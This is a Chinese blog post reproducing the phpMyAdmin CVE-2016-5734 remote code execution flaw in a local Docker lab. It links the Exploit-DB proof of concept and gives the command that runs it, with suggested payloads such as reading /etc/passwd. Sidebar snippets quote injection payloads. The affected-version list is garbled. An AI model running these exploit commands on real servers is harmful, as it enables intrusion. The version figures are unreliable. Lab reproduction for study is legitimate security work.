PhpMyAdmin 4.0.x - 4.6.2 远程执行代码漏洞 (CVE-2016-5734)复现

最新推荐文章于 2024-05-27 17:25:08 发布
最新推荐文章于 2024-05-27 17:25:08 发布
阅读量359 收藏
点赞数
分类专栏: 漏洞复现 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/haoxue__/article/details/129349436
版权

PhpMyAdmin 4.0.x - 4.6.2 远程执行代码漏洞 (CVE-2016-5734)复现

漏洞影响

PhpMyAdmin是一个用PHP编写的免费软件工具,旨在通过Web处理MySQL的管理。漏洞出在函数中,因为用户提交的信息可以拼接到第一个参数中。preg_replace

在 PHP 5.4.7 之前,的第一个参数可以被截断,并将搜索模式更改为 。它可能导致远程执行代码漏洞。preg_replace\0\e

受影响的版本:

4.0.4.0 之前的 10.16.x 版本
4.4.4.4 之前的 15.7.x 版本
4.6.4之前的6.3.x版本(其实因为这个版本需要PHP5.5+,这个漏洞无法重现)

环境搭建

在phpmyadmin/CVE-2016-5734/目录下运行命令

docker-compose  up -d

在这里插入图片描述
查看镜像

docker container ps -a

在这里插入图片描述

复现过程

0x00 下载poc

下载链接

https://www.exploit-db.com/exploits/40185

0x01 实施攻击
python3 cve-2016-5734.py -c 'system(id);' -u root -p root -d test http://your-ip:8080/

id是你想要执行的命令,可以替换为pwd、cat /etc/passwd 等
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

总结

我尝试了ls /、ls /var/、ls /tmp/都可以,但是ls /root/、ls /home/ 命令不能执行。我想这可能是权限的问题。

haoxue__
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Adminer≤4.6.2任意文件读取漏洞1
08-03
Adminer≤4.6.2 任意件读取漏洞0x01 前SQLite、PostgreSQL 等众多主流数据库,类似于 phpMyAdmin 的 MySQL 管理客
phpmyadmin漏洞合集
weixin_46626737的博客
07-02 519
../,比如在cmd命令行中,cd 到一个不存在的目录,会报错,在对传参的参数进行过滤时,需要过滤代码,但是传参点很多,需要多次输入过滤代码,开发人员考虑到使用将过滤代码写入过滤文件,通过include包含该文件,来达到一个过滤的目的,假如这个包含的文件是可以控制的,那么就可能导致文件包含,该漏洞中,主要是因为对于传参包含文件的参数过滤时,只是对其内容进行检测白名单验证,只要target参数是白名单中的。但是如果在其后加一个/../,系统会默认认为还是在当前目录,就不会对错误目录进行检查,也就不会报错;
phpmyadmin漏洞汇总
最新发布
m0_64481831的博客
05-27 976
phpmyadmin是一个以PHP为基础,以web方式架构在网站主机上的mysql的数据库管理工具,让管理者可用web接口管理mysql数据库,便于远端管理mysql数据库。
最全phpmyadmin漏洞汇总
m0_67402013的博客
07-31 9491
phpMyAdmin是一个用php编写的免费软件工具,旨在通过Web友好界面处理MySQL的管理。phpMyAdmin支持对MySQL和MariaDB数据库的广泛操作。经常使用的操作(有如管理数据库、表、列、关系、索引、用户、权限等)可以通过用户界面执行,当然您也可以直接执行任何SQL语句。从1998年发布第一版,到目前发布的最新版为5.1.1,全部历史版本说明phpMyAdmin5.2未来版本与PHP7.2及更高版本和MySQL/MariaDB5.5及更高版本兼容。1、1、条件。...
phpMyAdmin 常见漏洞利用记录
The current road is different, love needs to distinguish between right and wrong
11-26 2452
目录 简介 phpmyadmin版本信息获取 phpmyadmin密码爆破 phpmyadmin文件写入 phpmyadmin日志写shell phpmyadmin版本漏洞 phpmyadmin 2.x版本反序列化漏洞任意文件读取(wooyun-2016-199433) CVE-2016-5734 RCE命令执行 CVE-2018-12613 文件包含 结语 简介 phpMyAdmin 是一个以PHP为基础,以WebBase方式架构在网站主机上的MySQL的数据库...
phpmyadmin scripts/setup.php 反序列化漏洞 S2-001远程代码执行漏洞复现漏洞要求:
记录笔记
04-12 218
phpmyadmin scripts/setup.php S2-001远程代码执行漏洞复现漏洞 我们在密码处输入:%{2*2} 会回显出执行的结果,说明漏洞可能存在 %{“tomcatBinDir{”+@java.lang.System@getProperty(“user.dir”)+“}”} %{ #req=@org.apache.struts2.ServletActionContext@getRequest(), #response=#context.get(“com.opensymp
Phpmyadmin后台代码执行CVE-2016-5734_poc
09-30
CVE-2016-5734在exploit-db上也就是 phpMyAdmin 4.6.2 - Authenticated Remote Code Execution ,意即phpMyAdmin认证用户的远程代码执行,根据描述可知受影响的phpMyAdmin所有的 4.6.x 版本(直至 4.6.3),4.4.x ...
phpMyAdmin-4.0.10.11-all-languages.zip
10-25
MySQL管理工具phpMyAdmin 4.0.10.11,兼容PHP 5.2 和 MySQL 5。 从官网下载,MD5:(934aea4e16597a2a15ac51eb34e244a3) phpMyAdmin更新的版本已经不再兼容PHP 5.2,如果小盆友的服务器还在运行5.3以下版本的PHP,...
phpMyAdmin-4.0.10.17-all-languages
11-19
标题中的"phpMyAdmin-4.0.10.17-all-languages"指的是该版本的phpMyAdmin,它支持多种语言,方便不同地区的用户使用。在这个版本中,包含了所有语言的文件,为全球用户提供无语言障碍的服务。 在阿里云上搭建博客,...
phpMyAdmin-4.0.10.10-all-languages.tar.gz
10-20
1. **版本信息**:4.0.10.10 是 phpMyAdmin 的一个稳定版本,发布于2016年,旨在修复已知的安全漏洞和改进用户体验。在这一版本中,开发团队对界面进行了优化,同时增强了性能和安全性。 2. **全语言支持**:"all-...
phpMyAdmin-4.0.4.2-all-languages.zip
08-11
安装完成后,将解压后的“phpMyAdmin-4.0.4.2-all-languages”文件夹放在Web服务器的文档根目录下,确保所有必需的PHP扩展(如mysqli或PDO_MySQL)已启用。配置好config.inc.php文件,输入数据库连接信息,之后便...
phpmyadmin后台文件包含漏洞分析
nareku的博客
04-10 5901
前言 在墨者学院看到这道题给的标签是文件包含,就想着拿来练练手,果然不练不知道一练吓一跳,里面还是有很多我没学到和不懂的知识,所以就打算单独拿出来写一篇博客来记录一下。
phpMyAdmin 4.8.1 本地文件包含漏洞复现
weixin_51681694的博客
04-22 469
漏洞点在根目录下的index.php中的61行target传参可任意控制,控制index.php包含任意文件上面的if条件需要满足target且为且且中黑名单:查看最后一个条件,需要返回true第一个红框定义白名单第二个红框检查文件名是否在白名单中,在则返回true第三个红框将原传入字符串从0到?前分割出来,再检查字符串是否在白名单中,在则返回true可以考虑设置字符串内容?之前的字符串为白名单,绕过过滤,可是?不能出现在文件名中最后则是利用点。
PhpMyAdmin远程执行代码漏洞复现CVE-2016-5734
千寻的博客
03-21 1445
phpMyAdmin`中存在安全漏洞,该漏洞源于程序没有正确选择分隔符来避免使用`preg_replace e`修饰符。远程攻击者可借助特制的字符串利用该漏洞执行任意PHP代码
phpmyadmin getshell总结
good good study
10-25 3091
phpMyAdmin 是一个用PHP编写的开源软件工具,可以通过web方式控制和操作MySQL数据库。通过phpMyAdmin 可以完全对数据库进行操作,例如建立、复制和删除数据等。
phpmyadmin反序列化漏洞
qq_53008544的博客
05-01 560
phpMyAdmin的Setup脚本用于生成配置。如果远程攻击者向该脚本提交了特制的POST请求的话,就可能在生成的config.inc.php配置文件中包含任意PHP代码。由于配置文件被保存到了服务器上,未经认证的远程攻击者可以利用这个漏洞执行任意PHP代码
phpMyAdmin 4.8.x 最新版 本地文件包含漏洞利用
Ambulong的博客
06-21 5970
今天ChaMd5安全团队公开了一个phpMyAdmin最新版中的本地文件包含漏洞phpmyadmin4.8.1后台getshell。该漏洞利用不要求root帐号,只需能够登录 phpMyAdmin 便能够利用。 在这篇文章中我们将使用VulnSpy的在线 phpMyAdmin 环境来演示该漏洞的利用。 VulnSpy 在线 phpMyAdmin 环境地址:http://www.vulnspy.c...
CVE-2016-5734
09-04
- *2* *3* [CVE-2016-5734 Phpmyadmin后台代码执行漏洞复现](https://blog.csdn.net/weixin_41924764/article/details/113063083)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值